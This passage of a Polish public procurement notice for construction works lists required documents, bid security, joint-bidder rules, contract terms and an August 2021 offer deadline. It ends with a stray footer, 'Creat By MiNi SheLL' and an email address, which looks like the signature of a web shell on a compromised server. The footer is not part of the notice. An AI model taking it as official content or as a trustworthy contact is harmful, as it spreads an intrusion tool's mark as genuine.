rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty ( wg<br/>załącznika Nr 4),<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ( wg załącznika Nr 5<br/>),<br/>c) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem.<br/>d) dokument potwierdzający, że wykonawca jest ubezpieczony od OC w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej ubezpieczenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> - kosztorys ofertowy uproszczony, który będzie zawierał:<br/>a) liczbę porządkową,<br/>b) opis ( obliczenia ) pozycji kosztorysowanych robót i nakład,<br/>c) wartość za pozycję,<br/>d) podsumowanie kosztorysu.<br/>Kosztorysy ofertowe poszczególnych branż MUSZĄ odzwierciedlać pozycje z przedmiarów robót<br/>i zachowywać ich kolejność. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy 2) Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków<br/>udziału w postępowaniu 3) Pełnomocnictwo 4) Zobowiązanie podmiotu (jeżeli dotyczy)5)<br/>Wadium 6) Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy),7) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia składają do oferty oświadczenie, z którego będzie<br/>wynikać, które roboty budowlane wykonają poszczególni wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 8000,- zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:1) wspólnie<br/>spełniają warunki udziału w postępowaniu,2) w stosunku do żadnego z nich nie zachodzi<br/>jakakolwiek podstawa do wykluczenia z postępowania na podstawie art. 108 ust. 1 oraz art. 109<br/>ust. 1 pkt. 4 ustawy Pzp,3) ponoszą solidarną odpowiedzialność za niewykonanie lub<br/>nienależyte<br/>wykonanie zobowiązania,4) muszą ustanowić pełnomocnika wykonawców występujących<br/>wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo<br/>musi mieć formę pisemną lub kopię potwierdzona przez notariusza,5) przed zawarciem umowy<br/>o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych<br/>wykonawców.6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek<br/>dołączyć do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają<br/>poszczególni wykonawcy.7) Przepisy dotyczące wykonawcy stosuje się odpowiednio do<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> warunki zmian określone zostały w dokumentach zamówienia SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-31 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca w terminie nie krótszym niż 5 dni od daty otrzymania informacji o ofercie najwyżej<br/>ocenionej:1) poda wszelkie informacje niezbędne do wypełnienia treści umowy na wezwanie<br/>Zamawiającego,2) przedstawi oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na<br/>podstawie umowy o pracę osób wykonujących bezpośrednie czynności przy realizacji<br/>Ogłoszenie nr 2021/BZP 00017712/01 z dnia 2021-03-15<br/>2021-03-15 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane<br/>jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>przedmiotu zamówienia czynności; oświadczenie to powinno zawierać w szczególności:<br/>dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia,<br/>wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o<br/>pracę wraz ze wskazaniem liczby tych osób, imion i nazwisk tych osób, rodzaju umowy o pracę i<br/>wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy<br/>lub podwykonawcy,3) przedstawi aktualne dokumenty potwierdzające, że wymienione w<br/>wykazie osoby posiadają wymagane uprawnienia budowlane.4) umowa konsorcjum5).<br/>Wykonawca będzie zobowiązany w terminie 5 dni od daty otrzymania informacji o ofercie<br/>najwyżej ocenionej przedłożyć kosztorys ofertowy opracowany metodą szczegółową, na<br/>podstawie załączonego do SWZ przedmiaru robót. Do kosztorysu ofertowego należy załączyć<br/>zestawienie założeń wyjściowych do kosztorysowania, tj. cen jednostkowych materiałów,<br/>czynników produkcji tj. stawka rbh, kosztów pośrednich, kosztów zaopatrzenia i zysku oraz<br/>stawki jednostkowej pracy podstawowego sprzętu i urządzeń, które wykonawca będzie używał<br/>do wykonania przedmiotu zamówienia. Suma końcowa kosztorysu ofertowego (wartość netto)<br/>winna zamknąć się kwotą netto wynikającą z ceny oferty złożonej przez Wykonawcę. Kosztorys<br/>ofertowy będzie służył Zamawiającemu m.in. do:a) rozliczenia się z Wykonawcą w sytuacji, jeżeli<br/>wystąpią okoliczności wykonania nieprzewidzianych robót zamiennych lub wystąpi<br/>nieprzewidziana konieczność zaniechania części robót,b) kontroli wynagrodzenia dla<br/>podwykonawców lub dalszych podwykonawców, c) rozliczenia płatności częściowej i końcowej

Creat By MiNi SheLL
Email: jattceo@gmail.com